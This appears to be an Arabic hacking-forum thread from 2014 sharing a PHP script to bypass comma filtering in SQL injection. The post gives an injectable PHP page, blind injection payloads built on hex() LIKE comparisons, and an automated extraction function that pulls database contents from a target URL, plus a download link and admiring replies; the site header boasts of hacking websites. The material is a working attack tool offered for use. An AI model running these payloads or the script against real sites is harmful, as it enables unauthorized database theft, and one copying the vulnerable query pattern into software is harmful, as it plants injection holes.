1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ سكربت ] يتخطى فلتر الفواصل في الحقن

الموضوع في 'قسم الأدوات - Tools' بواسطة V!P-Hero, بتاريخ ‏6 ابريل 2014.

كاتب الموضوع : V!P-Hero المشاهدات : 568 الردود : 6 ‏6 ابريل 2014
  1. غير متصل

    V!P-Hero
    DeveloPer Plus

    عضو منذ:
    ‏27 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    الإقامة:

    [​IMG]

    اليوم جايبلكم معي سكربت قوي لتخطي فلتر الفواصل

    السكربت

    كود PHP:
    $ids=$_GET['id'];
    $ids=str_replace(",","",$ids);
    $connect=mysql_connect("localhost""albert""toor") or
        die(
    "Could not connect: " mysql_error());
    $conn=mysql_select_db("band3r",$connect);
     
    $sql="SELECT * FROM `mytable` WHERE `id`='$ids'";

    $result mysql_query($sql);
        if( 
    $result )
        {
            while( 
    $row mysql_fetch_array$result ) )
            {
                echo 
    $row['id'];
                echo 
    '<br>';
                echo 
    $row['****'];
                echo 
    '<br>';
                echo 
    $row['for'];
                echo 
    '<br>';
            }
        }
        else
        {
            echo 
    'error exit';
            exit;
        }

    ?>
    و بعد التفكير
    لايمكنك استعمال اي حقنة
    union query
    لاتنفع
    boolean based and time based
    نفس الشئ
    ما هي الطريقة ؟؟؟؟؟؟؟؟؟؟

    الحل و بعد التفكير العميق ههههه
    حقنة لاتستعمل الفواصل
    +
    اسرع من البليبد العادي
    الحل امامكم

    كود PHP:
    and hex(version()) like 'X%'
    الفكرة كما تلاحظون
    جلب استعلام السكيول و يشفيره و المقاربة
    التشفير بالهكس
    كل حرف مكون من عنصرين
    العنصر الاول من 2 حتى 7

    كود PHP:
    $hex1 = array(1234567);
    العنصر الثاني

    كود PHP:
    $hex2 = array(0123456789'a''b''c''d''e''f');
    الان طريقة العمل

    كود PHP:
    and hex((select group_concat(schema_****) from information_schema.schemata)) like 'X%'
    الان نقوم نتغيير X
    من 2 حتي 7
    حتي تصبح النتيجة صحيحة
    فرضا ان الرقم 6 اصبح النتيجة صحيحة
    الان تصبح

    كود PHP:
    and hex((select group_concat(schema_****) from information_schema.schemata)) like '6X%'
    الان نغس الشئ لكن العنصر الثاني احتمالية 16
    يعني شوف hex2
    و نغير حتي تصبح النتيجة صحيحة
    ثم نكون قد وصلنا الى الحرف الاول

    الطريقة اليدوية صعبة شوية
    جلست اما الجهاز و بعد التفكير الطويل تم الوصول الى برمجة دالة اوتوماتيكي
    تضغ الاستعلام + الهدف تعطيك النتيجة بدون وجع راس
    الدالة :

    كود PHP:
    /*
      coded by massacreur -- toxico-dz
      email :  w ebservers@hotmail.fr
      home : sec4ever.com
    */ 
    function sql_inj($sql) {

      global 
    $target;
      global 
    $end;
      
    $hex1 = array(1234567);
    $hex2 = array(0123456789'a''b''c''d''e''f');
      
    $hex "";
      
    $m 0;
      while (
    $m == 0) {
        for (
    $i 0$i 7$i++) {
          
    $get "' and hex((" $sql ")) like '" $hex $hex1[$i] . $end;
          
    $get str_replace(' ''%20'$get);
          if (
    source($target $get) == 1) {
            
    $hex .= $hex1[$i];
            for (
    $h 0$h 16$h++) {
              
    $get2 "' and hex((" $sql ")) like '" $hex $hex2[$h] . $end;
              
    $get2 str_replace(' ''%20'$get2);
              if (
    source($target $get2) == 1) {
                
    $hex .= $hex2[$h];
                
    $h 20;
                
    $i 20;
                
    $marquer 'massacreur';
              }
            }
          }
          else {
            
    $marquer 'non';
          }
        }
        if (
    $marquer == 'non') {
    ///////
          
    $datas hextostr($hex);
          
    $datas explode(','$datas);
          
    $m 1;
        }
      }
      return 
    $datas;
    }

    function 
    hextostr($x) {
      
    $s '';
      foreach (@ 
    explode("\n"trim(chunk_split($x2))) as $h)
        
    $s .= chr(hexdec($h));
      return (
    $s);
    }
    شرح السكربت + ارفاق السكربت :{y.}

    http://www.iq-team.org/up/uploads/139677053783861.zip

    :{10}:
     


    جاري تحميل الصفحة...
  2. غير متصل

    ӎƦ.HmidE
    DeveloPer Plus

    عضو منذ:
    ‏9 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الوظيفة:
    .....
    الإقامة:

    رد: يتخطى فلتر الفواصل في الحقن

    مشكور وبارك الله بيك :{12}:
     


  3. غير متصل

    Mr.Flash
    rank
    Developer

    عضو منذ:
    ‏14 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: يتخطى فلتر الفواصل في الحقن

    الله يعطيك العافيه &:"
     


  4. غير متصل

    - ! • ĻİǾŊ ÄĹ-3ЯÁQ • ! -
    rankrank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏17 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: يتخطى فلتر الفواصل في الحقن

    مبـــــــدع آستمر
     


  5. غير متصل

    switch hack
    rank
    Developer

    عضو منذ:
    ‏24 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: يتخطى فلتر الفواصل في الحقن

    واصل يا بطل
     


  6. غير متصل

    Gaza-Dz
    مراقب عآم

    عضو منذ:
    ‏26 مايو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    112
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    DZ
    الإقامة:

    رد: يتخطى فلتر الفواصل في الحقن

    السلام عليكم ورحمة الله وبركاته
    يـــعــطــيـــك الـصحـــــــــــــة
    بانتظار كل ما هو جديدك
    ربي يفقك يا غالي
     


  7. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: يتخطى فلتر الفواصل في الحقن

    بوركت يابطل
    برمجة ذهبية
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...